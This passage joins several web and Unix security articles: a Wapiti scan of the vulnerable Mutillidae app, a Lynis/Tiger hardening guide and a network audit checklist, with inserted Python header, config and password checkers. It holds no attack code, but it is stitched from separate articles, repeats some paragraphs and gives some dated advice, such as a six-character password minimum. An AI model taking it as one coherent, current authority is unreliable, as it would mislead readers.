As you can see in the example above, we ran wapiti in verbose mode and it generated a report in HTML format. We use open /path/to/file to open the HTML file in a web browser. Below is what that looks like:

From this generated report, we see that we have a possible vulnerability with the Content Security Policy configuration. As you can see, the issue is with our CSP, which helps mitigate and detect attacks such as XSS. Keep following along below to see the solution wapiti returns:

The solution above is provided by wapiti.
Rather than a solution, it is more of a highly recommended suggestion that you can choose to heed or not. Configuring our CSP would allow for better deterrence of attacks.

HTTPOnly Flag Cookie:

In the image above, we also see that we receive a vulnerability with the HttpOnly flag cookie. The HttpOnly flag is not set to true in this instance. Setting it to true will help mitigate the risk of client-side scripts accessing protected cookies.

Secure Headers Error:

In the image above, we also see that we receive a vulnerability stating it is an HTTP Secure Headers Error. Modern browsers support many HTTP headers that can improve web application security to protect against clickjacking, cross-site scripting, and other common attacks. Wapiti refers to some links that will help in hardening your web applications.

Mutillidae Test:

For this example, we ran this command against Mutillidae, a deliberately vulnerable web application. While running, wapiti will show you in real time the tests it is running, like below:

In the image above, while wapiti was running tests, it found an XSS vulnerability. In the image below, it found an SSRF vulnerability:

When wapiti is all finished with its scans, this is what it will output:

As you can see in the example above, we ran wapiti in verbose mode and it generated a report in HTML format. We use open /path/to/file to open the HTML file in a web browser. Below is what that looks like:

From this generated report, we see that we have possible vulnerabilities with the Content Security Policy configuration. As you can see, the issue is with our CSP, which helps mitigate and detect attacks such as XSS. Keep following along below to see the solution wapiti returns:

The solution above is provided by wapiti. Rather than a solution, it is more of a highly recommended suggestion that you can choose to heed or not. The CSP is not set; configuring our CSP would allow for better deterrence of attacks.
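The three report items just described (a CSP that is not set, a cookie without the HttpOnly flag, and missing hardening headers) can be checked for in a few lines once you have a raw response. The Python below is an added example, not Wapiti's code; the list of required headers and both sample responses are our own constructed assumptions.

```python
"""Checks for the three report items discussed above: a missing CSP,
cookies without HttpOnly/Secure, and missing hardening headers.
Added example; not Wapiti's code. The header list is our assumption."""
from typing import Dict, List, Tuple

# Headers whose absence we report (assumed list, not Wapiti's ruleset).
REQUIRED_HEADERS: Dict[str, str] = {
    "strict-transport-security": "HSTS keeps returning visitors on HTTPS",
    "x-frame-options": "clickjacking protection",
    "x-content-type-options": "stops MIME sniffing",
}


def parse_raw_headers(raw: str) -> List[Tuple[str, str]]:
    """Split an HTTP response header block into (name, value) pairs.
    Names are lower-cased; duplicates are kept because Set-Cookie repeats."""
    pairs: List[Tuple[str, str]] = []
    for line in raw.splitlines():
        if not line.strip() or line.startswith("HTTP/"):
            continue  # status line or blank separator
        name, _, value = line.partition(":")
        pairs.append((name.strip().lower(), value.strip()))
    return pairs


def check_cookie_flags(set_cookie: str) -> List[str]:
    """Report missing HttpOnly/Secure flags on one Set-Cookie value."""
    parts = [p.strip().lower() for p in set_cookie.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = set(parts[1:])
    findings = []
    if "httponly" not in attrs:
        findings.append(f"cookie '{name}' lacks HttpOnly (readable by client-side script)")
    if "secure" not in attrs:
        findings.append(f"cookie '{name}' lacks Secure (sent over plain HTTP)")
    return findings


def check_csp(headers: List[Tuple[str, str]]) -> List[str]:
    """Flag an absent CSP, a CSP with no default-src, or 'unsafe-inline'
    in default-src/script-src, which undoes most of the XSS benefit."""
    policies = [v for n, v in headers if n == "content-security-policy"]
    if not policies:
        return ["Content-Security-Policy header is not set"]
    findings = []
    for policy in policies:
        directives = {}
        for directive in policy.split(";"):
            tokens = directive.split()
            if tokens:
                directives[tokens[0].lower()] = tokens[1:]
        if "default-src" not in directives:
            findings.append("CSP has no default-src fallback")
        for name in ("default-src", "script-src"):
            if "'unsafe-inline'" in directives.get(name, []):
                findings.append(f"CSP {name} allows 'unsafe-inline'")
    return findings


def audit_response_headers(raw: str) -> List[str]:
    """Run all checks over one raw response header block."""
    headers = parse_raw_headers(raw)
    findings = check_csp(headers)
    present = {n for n, _ in headers}
    for header, why in REQUIRED_HEADERS.items():
        if header not in present:
            findings.append(f"missing {header} ({why})")
    for name, value in headers:
        if name == "set-cookie":
            findings.extend(check_cookie_flags(value))
    return findings


# Constructed sample responses (not real captures). The first resembles
# the findings above: no CSP, a cookie without HttpOnly, headers missing.
SAMPLE_WEAK = """HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Set-Cookie: session=abc123; Path=/; Secure
"""

SAMPLE_HARDENED = """HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Security-Policy: default-src 'self'; script-src 'self'
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Set-Cookie: session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax
"""

if __name__ == "__main__":
    for label, raw in (("weak", SAMPLE_WEAK), ("hardened", SAMPLE_HARDENED)):
        print(f"{label}:")
        for finding in audit_response_headers(raw) or ["no findings"]:
            print("  -", finding)
```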
Path Traversal:

A path traversal vulnerability allows cybercriminals to access files on your web server to which they should not have access. They do this by tricking either the web server or the web application running on it into returning files that exist outside of the web root folder. Using code access policies and chrooted jails, along with file path code that prevents users from entering the full path, we can fix these vulnerabilities.

HTTPOnly Flag Cookie:

In the image above, we also see that we receive a vulnerability with the HttpOnly flag cookie. The HttpOnly flag is not set to true in this instance. Setting it to true will help mitigate the risk of client-side scripts accessing protected cookies, as shown in the solution below:

Secure Headers Error:

In the image above, we also see that we receive a vulnerability stating it is an HTTP Secure Headers Error. Modern browsers support many HTTP headers that can improve web application security to protect against clickjacking, cross-site scripting, and other common attacks. Wapiti refers to some links that will help in hardening your web applications, like below:

SQL Injection (SQLi):

SQL injection attacks allow cybercriminals to spoof identity, tamper with existing data, destroy the data or make it otherwise unavailable, and possibly even become administrators of the database server. Scanning for possible SQLi vulnerabilities will help prevent your database from being taken over. As you can see above, Wapiti even provides us with a solution: user input must not directly be embedded in SQL statements. Instead, user input must be escaped or filtered, or parameterized statements must be used. Depending on the company, getting this information to the proper team is essential to get it resolved.

Server Side Request Forgery (SSRF):

Solution:

SSRF allows attackers to carry out scans and collect information about internal networks.
Once an attacker has gained access to the server, they can use this information to compromise other servers within the network. Quite a few breaches within the past couple of years, such as Capital One and MS Exchange, have included SSRF attacks. SSRF vulnerabilities allow cybercriminals to send requests from the back-end server of the web application, and they do this to target internal systems that are behind firewalls and are not accessible externally. Scanning for SSRF will aid in mitigating these attacks and, hopefully, keeping your system secure. Wapiti provides us with a solution as shown above. The more frequently you scan, the closer you are to avoiding another Capital One-like incident.

Cross-Site Scripting (XSS):

Solution:

Cross-site scripting works by manipulating a vulnerable website so that it returns malicious JavaScript to users. Cybercriminals can fully compromise users' interaction with web applications by executing this malicious JavaScript code. The way to ensure that you, your users, and your web app are safe is to ensure that the application checks and validates headers, cookies, query strings, forms, and hidden fields. Moreover, encoding user output can help mitigate these types of attacks.

Wapiti Summary

Wapiti is a well-known tool that is widely used amongst security researchers, regular users, and even system administrators. As cybercriminals continue to exploit newfound vulnerabilities and even existing ones due to poor security management, Wapiti is the perfect solution for auditing your website and web servers. The commands and arguments are fairly simple to use, it is a powerful tool, and the report provided in HTML format allows any user to see urgent issues and their possible solutions without having to sit, search, and create a solution. It provides you with a baseline understanding of your vulnerabilities and a baseline path to a solution.
Our Thoughts

Web applications are the technological base of modern companies. That's why more and more businesses and corporate institutions are looking to monitor their websites and web apps more often, and Wapiti is the perfect tool to do so. It is amongst many well-known web vulnerability scanners and can play an essential role in assisting daily users and system administrators alike to deter attacks. We hope you found this article useful! Be sure to stay tuned for more tips and advice on Linux security tools.

Brian Gomez
System administrators are aware of how important their systems' security is, not just the uptime of their servers. Intruders, spammers, DDoS attacks, crackers, are all out there trying to get into people. Being able to identify tools and techniques to harden your systems is a key play in securing your systems. Moreover, choosing the right tools is a matter of experience. You should try most of them, or perhaps the ones that are popular. I chose free and open source software because, if I want to, I can check the application's source code and see for myself how the programmers wrote the software, how they managed to keep the software easy to understand, etc. Without trying to explain the particular importance of network peripherals to the security of the whole system, I will dig deep into software that checks system protocols, passwords, vulnerabilities, weaknesses, security flaws, best practices on protecting and securing your system and so on, and then some important security steps any system administrator should know. I chose two popular security tools: Tiger and Lynis, both state-of-the-art security-auditing tools.

Lynis

Lynis is Unix-based software, free under the GPL, and a popular security hardening solution. The advantage here is that it does not change any of your configuration files. Instead, it lists what it sees as weak or in need of change. It can scan your system in detail and very extensively. Its use is straightforward, and it is OS independent, which means it will run in almost any Linux or Unix environment. You can run Lynis from USB, CD, external HDD or any other media. With the proper plugins, Lynis can test your databases, e-mail servers, web servers and what not. There is plenty of documentation and many video presentations on installing, configuring and using Lynis. I advise you to search for these and read as much as you can until you feel comfortable, then start testing and using it.
The latest version of Lynis as of now is 2.1.0 and can be obtained at: /downloads/lynis/

Tiger

Just like Lynis, Tiger supports multiple UNIX platforms and is free under the GPL license. Besides system hardening tools, system configuration checks, etc., Tiger offers host-based intrusion detection, and it is very successful at it. It's worth noting for Linux/Unix newcomers that, while there are lots of intrusion detection tools out there, most of them if not all are command line and offer minimal X-based or GUI mode. As of now, the latest stable version of Tiger is 3.2.3, and can be obtained at: Index of /releases/tiger/

I'll describe some Tiger scripts and their use. You are advised to check its documentation and find what interests you and what you are trying to accomplish.

- check_inetd – This script will check your init.d and find any misconfiguration.
- check_group – As its name suggests, it will check group password vulnerabilities, duplication and so on.
- check_accounts – This script will check your accounts for anything suspicious: home directories, shells, accounts with no passwords, etc.
- check_anonftp – This checks your FTP configuration for any vulnerability.
- check_passwd – Checks password configurations.

Security Tips:

I can't stress enough how important it is for a Unix system to have root login disabled. This is a crucial step and should be deactivated on all systems running important services, period. Besides disabling root login, it is advisable and very important to have X Windows uninstalled. This is necessary if you're running the Apache web server and you don't need X Windows. Remember, X Windows is and can be vulnerable to attacks. Never use unsecured connections like telnet, FTP and so on! Use SSH and SFTP instead! Set strong password policies and a password expiration date, so that the user is prompted to change the password when it expires. This will ensure consistent password changes on all user accounts.
I would advise setting it to three months at the latest. Check file permissions periodically; this can create havoc if not set properly. Close unused ports. Remove unnecessary software. Check various security websites (do this daily) for security holes people and programmers have found, and patch them immediately if your system is vulnerable! sysctl: an interface for changing kernel parameters in Unix-like environments. Read up on sysctl and tweak the configuration the way you want it. Implement firewalls (iptables). Make daily backups! This is very important. Keep another backup server away from the server room for disaster recovery, etc.

I could have filled this document with screenshots and information on how to do all these things I explained, but I thought it would be much better if you try them yourself. When you search for knowledge, I strongly believe, you will learn things much better, and sooner. You can refer to these two system hardening programs and security tips, but don't limit yourself. Try anything you can find; perhaps look for popular software and try it on your test machines, simulate real-life situations, configurations and so on. Remember, security measures start with keeping your system's version up to date! Last but not least, I would be very happy if you share some security tips with us on this post, so people can enjoy and learn more and be successful in what they do.

About the Author

Mr. Ibrahimi is a freelance Unix/Linux specialist and consultant with over 15 years of experience in Open Source software. He is a regular contributor to the UNIX community online as well as locally on projects involving his expertise in implementing Unix/Linux in IT infrastructures.

Dave Wreski
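Three of the security tips above (root login disabled, passwords expiring within three months, no telnet/FTP) are the kind of check Lynis and Tiger report without touching your configuration. The Python below is an added example in that spirit, not Lynis or Tiger code; the sample sshd_config, login.defs and inetd.conf contents are constructed, and the list of cleartext services is our assumption.

```python
"""Small Lynis/Tiger-style audit of three of the tips above: root SSH
login disabled, password expiry within three months, no telnet/ftp in
inetd. Added example, not Lynis or Tiger code; samples are constructed."""
from typing import Iterator, List, Tuple

MAX_PASSWORD_AGE_DAYS = 90          # "three months at the latest"
LEGACY_SERVICES = {"telnet", "ftp", "rsh", "rlogin", "rexec"}  # cleartext (assumed list)


def _directives(text: str) -> Iterator[Tuple[str, str]]:
    """Yield (keyword, rest) from a config, skipping comments and blanks."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) == 2:
            yield parts[0], parts[1].strip()


def check_root_login(sshd_config: str) -> List[str]:
    """sshd uses the first PermitRootLogin it sees; anything but 'no' fails."""
    for key, value in _directives(sshd_config):
        if key.lower() == "permitrootlogin":
            if value.lower() != "no":
                return [f"PermitRootLogin is '{value}'; set it to 'no'"]
            return []
    return ["PermitRootLogin not set; the sshd default applies, set it to 'no' explicitly"]


def check_password_age(login_defs: str) -> List[str]:
    """PASS_MAX_DAYS in /etc/login.defs; unset or negative means no aging."""
    for key, value in _directives(login_defs):
        if key == "PASS_MAX_DAYS":
            if not value.lstrip("-").isdigit():
                return [f"PASS_MAX_DAYS has a non-numeric value '{value}'"]
            days = int(value)
            if days < 0 or days > MAX_PASSWORD_AGE_DAYS:
                return [f"PASS_MAX_DAYS is {days}; expire passwords within "
                        f"{MAX_PASSWORD_AGE_DAYS} days"]
            return []
    return ["PASS_MAX_DAYS not set; password aging is disabled"]


def check_inetd_services(inetd_conf: str) -> List[str]:
    """Active (uncommented) inetd entries for cleartext services."""
    findings = []
    for service, _rest in _directives(inetd_conf):
        if service.lower() in LEGACY_SERVICES:
            findings.append(
                f"inetd enables cleartext service '{service}'; use SSH/SFTP instead")
    return findings


def audit(sshd_config: str, login_defs: str, inetd_conf: str) -> List[str]:
    """All findings for one host, in check order."""
    return (check_root_login(sshd_config)
            + check_password_age(login_defs)
            + check_inetd_services(inetd_conf))


# Constructed sample files: one weak host, one that follows the tips.
SSHD_WEAK = "Port 22\nPermitRootLogin yes\nPasswordAuthentication yes\n"
LOGIN_DEFS_WEAK = "PASS_MAX_DAYS\t99999\nPASS_MIN_DAYS\t0\n"
INETD_WEAK = ("telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd\n"
              "#ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd\n")

SSHD_OK = "PermitRootLogin no\nPasswordAuthentication no\n"
LOGIN_DEFS_OK = "PASS_MAX_DAYS 90\n"
INETD_OK = "#telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd\n"

if __name__ == "__main__":
    for label, args in (("weak", (SSHD_WEAK, LOGIN_DEFS_WEAK, INETD_WEAK)),
                        ("hardened", (SSHD_OK, LOGIN_DEFS_OK, INETD_OK))):
        print(label, audit(*args) or ["no findings"])
```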
In the first part of Network Security we had a brief overview of the areas that are to be considered when assessing a network's security, and we also looked into a few points in each of the Management and Administration areas. Meanwhile, the article titled "Security Scanning is not Risk Analysis" by Laura Taylor on 14th July 2002 is a good article and deals in depth with what an organization's management has to know about security. Now let's continue and look into some of the finer points in each of the other areas, i.e., LAN Security, Access Control, Operations.

LAN Security:

Is the LAN secured from viruses? The extent of virus protection can be gauged by looking into the antivirus programs installed in the network. Things like: Does the mail gateway to the network have an online antivirus? Do the servers in the network have an online antivirus? (Having antivirus only on the servers will suffice if the end user has no external net access and no access to hardware to install new software, like using a floppy, etc.) Is third-party media (such as floppy/CD-ROM) access controlled (e.g. checked for viruses)?

Is the communication between systems controlled? Are the systems properly isolated (e.g. production systems should be separated from development systems) or are they provided with proper gateway access (setting up a firewall to control access between intra-networks, etc.)?

Are software/hardware acquisitions/disposals controlled? Check whether there is an established procedure for acquiring any new software/hardware requirements (usually it's required to get proper clearance and go through a proper channel for acquiring any new software/hardware). Even the disposal of hardware should be done with due permissions and through the proper channel (improper disposal of hardware like hard disks can prove to be a great security risk).

Check for unauthorized software/hardware installed on the LAN.
This check should be done manually on each of the systems in the network. Check for Trojans/rootkits etc. Check for the ports that are open on each system. Use a port scanner to detect any unwanted services running on the network. Any unwanted service/port open on the network is bound to pose a serious threat to security, usually because it may be a backdoor/Trojan, or because the administrator isn't aware of this service and so may not be monitoring its secure/insecure usage. This (point 4) is what is usually mistaken for a vulnerability assessment. I hope this article produces some awareness of real vulnerability assessments made by professionals, and that organizations give serious thought to vulnerability assessment.

Firewall and ACL Configuration

Are the firewall policies and Access Control Lists properly maintained/updated when changes are made to network access? Usually when any change is made to system access (e.g. removal of a system from the network), most administrators fail to cross-check this change with the firewall ruleset (if this system had access to a classified server, that ruleset still exists), and this may be misused. Similarly, the Access Control Lists should be cross-checked when any changes are made to user/group accounts.

Does the firewall contain rules to prevent denial of service attacks, and rules to prevent spoofing (e.g. requests coming from the outside network with an IP originating from the local internal LAN)? These are some of the most basic rules that should be present in any firewall. Check for the existence of a backup firewall in case of failure of the primary one.

The upload/download process should be monitored. (The user should be notified that their upload/download process and mail are being monitored, if they are.) Do the source and destination of a data transfer authenticate each other, and are the source/destination traceable (use DHCP for LAN address allocation, usually based on MAC addresses)?
Check that software license compliance exists (i.e., make sure that users are using legitimate software and are aware of software licensing). Check for accounts holding privileged rights and unused accounts; is there adequate support staff for providing user support, and is there a backup administrator in case of the primary one's absence? Is data being transported in encrypted form whenever necessary?

Access Control:

Check that user access is controlled appropriately. There are various guidelines to be followed when checking user access. Each user's privileges must be defined, documented, and controlled with appropriate access controls. Look for the user name and password policy. Each user should have a unique user name. The password set for (by) the user should be of a minimum length of 6 characters, and should contain a combination of letters and numerals and one special character (such as * # % ^ & $ etc.). Users/admins should avoid having passwords which are easily guessed, like the same as the username, the username backwards, etc. The password should be changed regularly (a password expiry period should be set). Check for guest user access rights and ex-staff accounts (these should not be present). Accounts should be disabled after 4-6 unsuccessful login attempts, and systems disconnected after a certain period of inactivity once a connection is established to a particular system (this requires settings to be made on the servers being accessed). Dial-up access should have another level of access control apart from user id and password (like callback). Access should also be time-controlled.

Operations:

It is not necessary that there should be an operations department in every organization. Some organizations suffice with only one IT department which handles all of the areas discussed. The organization's structure is not so important. But when implementing/assessing security, due care is to be taken in describing the duties of each of the concerned department personnel.
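The password rules in the Access Control section above (minimum 6 characters, letters plus numerals plus a special character, not the username or the username backwards) map directly onto a validator. The Python below is an added example, not from the article; the special-character set extends the page's "* # % ^ & $ etc." with all ASCII punctuation, and the sample candidates are constructed.

```python
"""Validator for the password rules in the Access Control section above.
Added example; the sample passwords are constructed, not real credentials."""
import string
from typing import List

MIN_LENGTH = 6
# The page lists * # % ^ & $ "etc."; we assume any ASCII punctuation counts.
SPECIAL_CHARS = set(string.punctuation)


def check_password_policy(username: str, password: str) -> List[str]:
    """Return the rule violations for a candidate password (empty = accepted)."""
    violations = []
    if len(password) < MIN_LENGTH:
        violations.append(f"shorter than {MIN_LENGTH} characters")
    if not any(c.isalpha() for c in password):
        violations.append("contains no letters")
    if not any(c.isdigit() for c in password):
        violations.append("contains no numerals")
    if not any(c in SPECIAL_CHARS for c in password):
        violations.append("contains no special character")
    # Guessability checks are case-insensitive: 'JSmith' still equals the login.
    lowered, user = password.lower(), username.lower()
    if lowered == user:
        violations.append("same as the username")
    elif lowered == user[::-1]:
        violations.append("username backwards")
    return violations


# Constructed candidates for user 'jsmith' (not real credentials).
SAMPLES = [
    ("jsmith", "jsmith"),       # same as username
    ("jsmith", "htimsj"),       # username reversed
    ("jsmith", "Ab1#"),         # too short
    ("jsmith", "Winter2024"),   # no special character
    ("jsmith", "Tr0ub4dor&3"),  # satisfies every listed rule
]

if __name__ == "__main__":
    for user, pw in SAMPLES:
        print(f"{pw!r}: {check_password_policy(user, pw) or ['ok']}")
```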
The physical transmission media like LAN cables, routers, switches, etc. should be adequately protected. The LAN servers should be secured from physical access too; unauthorized personnel shouldn't be able to get near them. Are the systems, peripherals, and devices protected from fluctuations/disturbances in the electric power supply? (Usually the network should contain an online UPS system to protect against power fluctuations and provide backup.) The setup should also ensure non-stop working of these devices, hence there should be a backup power supply.

The data backup should be taken regularly according to a schedule (full, incremental backups) and tested for restoration and backup errors. The backup media should be physically secured. A weekly backup should be placed at a different physical location (a different branch office) under safe custody in case of calamities like fire, flood, etc. The recovery process should be tested periodically.

The organization should ensure adequate staff capable of supporting the users and performing backup and recovery operations, and also ensure their availability at any time required. The user should know whom to contact for what kind of problems and how to reach them; for this, the users should be briefed about their actions in such situations.

Checks should be performed for adequate availability of resources (backbone, traffic on the file server and the ability of the file server to handle these loads). This check is to be performed on each of the generally accessed systems and the critical servers.

Access to critical systems (not necessarily limited to these) should be restricted with proper tools like keys, badges, electronic sensors, movement sensors, and biometric identification. Are the keys to important cabinets and rooms in safe custody? The system rooms should be properly protected against fire, so the existence of fire alarms and fire extinguishers are all good signs of proper security.
The computer systems should be periodically maintained and cleaned, and a log of the same kept for cross-checks. The users/admins should be adequately trained for the duties to be performed and for reporting problems. The users should be informed/warned about their intrusive activities (if any), and a procedure described for actions taken against them.

Literally speaking, everything listed in these parts is only a set of guidelines to consider. An actual assessment depends on the kind of organization, their use of information technology, the number of systems, the kind of data storage, and the type of business the organization does. Some of these points may prove to be too much to consider in some situations (and I consider this to be too little). A security audit should take into account anything that's a potential threat for disclosure of data, providing access to any unauthorized persons, improper use of resources, or the inability to handle breakdown of systems. I hope this article is of some help to someone somewhere in the globe.

Anthony Pell